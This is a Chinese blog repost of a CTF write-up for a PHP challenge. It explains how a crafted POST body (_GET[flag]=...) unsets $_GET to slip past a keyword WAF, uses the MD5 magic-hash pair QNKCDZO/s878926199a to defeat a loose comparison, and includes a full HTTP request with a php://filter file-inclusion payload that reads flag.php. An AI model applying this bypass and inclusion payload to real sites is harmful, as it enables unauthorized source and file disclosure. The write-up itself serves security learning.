变量覆盖的一道题目

最新推荐文章于 2021-12-25 16:20:18 发布
最新推荐文章于 2021-12-25 16:20:18 发布
阅读量534 收藏 4
点赞数
文章标签: php xhtml
原文链接:http://www.cnblogs.com/test404/p/9779235.html
版权 
<?php

function waf($a)

{ foreach($a as $key => $value)

  { if(preg_match('/flag/i',$key))

  {

  exit('are you a hacker'); } } }

foreach(array('_POST', '_GET', '_COOKIE') as $__R) {
        if($$__R) { 
        foreach($$__R as $__k => $__v) { 
            if(isset($$__k) && $$__k == $__v) unset($$__k); 
        }
     }

}
if($_POST) { waf($_POST);}
if($_GET) { waf($_GET); }
if($_COOKIE) { waf($_COOKIE);}

if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract($_GET, EXTR_SKIP);
if(isset($_GET['flag'])){
    if($_GET['flag'] === $_GET['daiker']){
        exit('error');
    }
    if(md5($_GET['flag'] ) == md5($_GET['daiker'])){
        include($_GET['file']);
    }
}

?>

这题刚上来先进行这一步操作

foreach(array('_POST', '_GET', '_COOKIE') as $__R) {
        if($$__R) { 
        foreach($$__R as $__k => $__v) { 
            if(isset($$__k) && $$__k == $__v) unset($$__k); 
        }    
}

典型的变量覆盖代码 继续往下开

if($_POST) { waf($_POST);}
if($_GET) { waf($_GET); }
if($_COOKIE) { waf($_COOKIE);}

然后

if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract($_GET, EXTR_SKIP);

看下面能文件包含的条件

if(isset($_GET['flag'])){
    if($_GET['flag'] === $_GET['daiker']){
        exit('error');
    }
    if(md5($_GET['flag'] ) == md5($_GET['daiker'])){
        include($_GET['file']);
    }
}

有个$_GET['flag'] 然而waf函数中

if(preg_match('/flag/i',$key)){
     exit('are you a hacker');
}

?flag=xxx 就会触发waf规则,如果我们向

index.php?x=123

提交一个POST请求内容为

_GET[x]=123

因为?x=123

所以$_GET内容为

array('x'=>'123')

当开始遍历$_POST的时候$__k是_GET[x],所以$$__k就是$_GET[x]也就是array('x'=>'123'),$__v是POST上来的一个数组,内容也是array('x'=>'123'),$$__k == $__v成立所以我们的超全局变量$_GET就被unset了 

所以GET  flag=xxxxx 就不会触发waf 了 因为还没进waf函数 GET就呗unset了

 

所以看一下给出的payload

POST /index.php?flag=QNKCDZO&daiker=s878926199a&file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1
Host: 119.23.73.3:5101
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=om11lglr53tm1htliteav4uhk4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

_GET[flag]=QNKCDZO&_GET[daiker]=s878926199a&_GET[file]=php://filter/read=convert.base64-encode/resource=flag.php

GET的作用就是用来在循环中配合POST 然后让循环操作把GET给在unset掉

而POST内容虽然存在flag关键字  在进waf函数之前var_dump一下 

array(1) {
  ["_GET"]=>
  array(3) {
    ["flag"]=>
    string(7) "QNKCDZO"
    ["daiker"]=>
    string(11) "s878926199a"
    ["file"]=>
    string(6) "11.txt"
  }
}

而waf函数

function waf($a){
    foreach($a as $key => $value){
        exit('are you a hacker');
    }
}

POST的所有$key都是_GET  $value是个array 所以POST不会触发waf函数

在下面的操作中 所以 POST里的变量 又转换成了GET的 然后进入if函数

if($_POST) extract($_POST, EXTR_SKIP);

 

转载于:https://www.cnblogs.com/test404/p/9779235.html

weixin_30258901
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WAF详解及WAF绕过
赤赤三的博客
03-20 8787
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
错题总结之变量交换
阿黄啦啦
05-25 565
题目一:有两个变量a和b,不用“if”、"?"、"switch"或者其他的判断语句,找出两个数中间比较大的。           int  max = ((a+b) + abs(a-b)) / 2; 题目二:给出三个整数a,b,c,函数实现取三个数的中间数,不可以使用sort,整数操作尽可能少 #include using namespace std; int max(int,int);
foreach(array('_COOKIE', '_POST', '_GET') as $_request)作用?
qq_30908729的博客
11-28 1079
  foreach(array('_COOKIE', '_POST', '_GET') as $_request)作用?   解决方法: 假如请求地址:yayihouse.com/index.php?name=1 foreach(array('_COOKIE', '_POST', '_GET') as $_request)的作用是获取参数很方便,例如:http://www.yayih...
PHP的两个特性导致waf绕过注入(有趣的知识点)
Exploit的小站~
07-04 8045
1、HPP HTTP参数污染 HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如: user.php?id=111&id=222 如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。 2、一个CTF题目 http://drops.wooyun.org/tips/
php 绕过 stripos,PHP的两个特性导致waf绕过注入(有趣的知识点)
weixin_29692851的博客
03-28 1570
1、HPP HTTP参数污染HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:user.php?id=111&id=222如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。2、一个CTF题目关于注入的waf绕过,注入点为:Default$sql="select * fro...
zoj题目简单归类zoj题目简单归类
08-02
题目背景可能包含多个变量或条件,解决方案通常涉及对所有可能的情况进行遍历,找到符合条件的解。状态压缩技巧可以帮助减少枚举的空间,从而提高效率。 #### #1115 Digital Root 这是一道数字处理题目,要求不断...
前端js 算法题目实例解析(1)
最新发布
01-07
这些JavaScript算法题目覆盖了数组操作、动态规划、字符串处理、滑动窗口等多种算法思想,是提升前端工程师技能的好材料。通过理解和实践这些题目,开发者可以增强逻辑思维能力,提高解决问题的效率,为日常开发工作...
shell编程实验题目
06-02
这些练习覆盖了从基本命令到复杂逻辑控制的多个方面,旨在让学生熟悉shell编程的核心概念和技术。 ##### 练习概览 - **例11-1至例11-14**:这些练习可能包括变量的定义与使用、条件语句、循环结构、函数定义、参数...
一道常被人轻视的web前端常见面试题(JS)
10-22
本文将深入分析一道常被忽视的JavaScript面试题,该题涉及到多个JavaScript核心概念,包括变量提升、`this`指向、运算符优先级、原型链、继承以及全局变量污染等。 题目如下: ```javascript function Foo() { ...
$$导致的变量覆盖问题
a3uRa的一个窝
08-11 856
使用foreach遍历数组中的值 &lt;?php foreach (array('_COOKIE','_POST','_GET') as $_request) { foreach ($$_request as $_key=&gt;$_value) { $$_key= $_value; // id为$_key 1为$_valu...
GJ-CTF web之 来一波_ 关于$_REQUEST变量
silence1_的博客
05-31 1768
GJ-CTF web之 来一波? 题目链接为:http://www.czlgjbbq.top/GJCTF/easyaduit.php 进入题目题目直接给了源码提示 主要的内容为: if($_REQUEST){ foreach ($_REQUEST as $key => $value) { if(preg_match('/[a-zA-Z]/i', $value)) { ...
(渗透学习)PHP($$)变量覆盖原理分析----变量覆盖漏洞
yang1234567898的博客
12-25 1373
如下代码段: <?php foreach (array("_COOKIE","_POST","_GET") as $_request){ foreach ( $$_request as $key => $value ){ $$key = $value } } ?> 首先将数组("_COOKIE","_POST","_GET")赋给$_request,即 $_request = ("_COOKIE","_POST","_GET") 然后拼接成...
CTF——PHP审计——变量覆盖
小锤队长的博客
08-25 4232
一,变量覆盖漏洞 参考:https://www.cnblogs.com/xiaozi/p/7768580.html 通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞。经常导致变量覆盖漏洞场景有: 1,$$使用不当, 2,extract()函数使用不当, 3,parse_str()函数使用不当, 4,import_request_variables()使用不当, 5,开启...
CTF web 对变量覆盖漏洞的题目的总结分析
weixin_45664911的博客
11-11 472
在做论剑场题目时,web1是有关变量赋值漏洞的题目,百度搜到了很多有关于变量赋值漏洞的文章,决定好好学习一下。 变量覆盖漏洞 变量覆盖指的是可以用我们自定义的参数值替换程序原有的变量值,变量覆盖漏洞通常需要结合程序的其他功能来实现完整攻击。 变量覆盖漏洞大多由函数使用不当导致,经常引发变量覆盖的漏洞有:extract()函数和parse_str()函数,import_request_varia...
红日代码审计day5 ctf
weixin_44897902的博客
02-02 346
<?php highlight_file('index.php'); function waf($a){ foreach($a as $key => $value){ if(preg_match('/flag/i',$key)){//遍历所有键,不能出现flag字样 exit('are you a hacker'); } ...
[ctf.show]命令执行29-54
Huamang的博客
03-01 2400
web 29 代码审计 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 涉及到一个函数preg_match(): 这个preg_match 函数用于执行一个正则表达式匹配。 看这次的判断是不能出现flag字样,后面的i意思
bugku 聪明的php
weixin_46578840的博客
07-28 195
打开网址得到一句话 传入参数a=得到一串代码,应该是确实为smarty模板注入 常用payload {if phpinfo()}{/if} {if system(‘ls’)}{/if} {if readfile(’/flag’)}{/if} {if show_source(’/flag’)}{/if} {if system(‘cat …/…/…/flag’)}{/if} smarty中的{if}标签中可以执行php语句 <?php include('./libs/Smarty.class.php')
青少年图形化编程四级考试实战题目精选
3. 关于变量管理,一道题目比较了两个程序中“计数”变量的增减机制,正确答案是C,强调了每个程序对空格键触发事件的不同处理方式。 4. 数列求和的题目展示了编程中的循环和算术运算,四个选项中只有D选项的程序1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值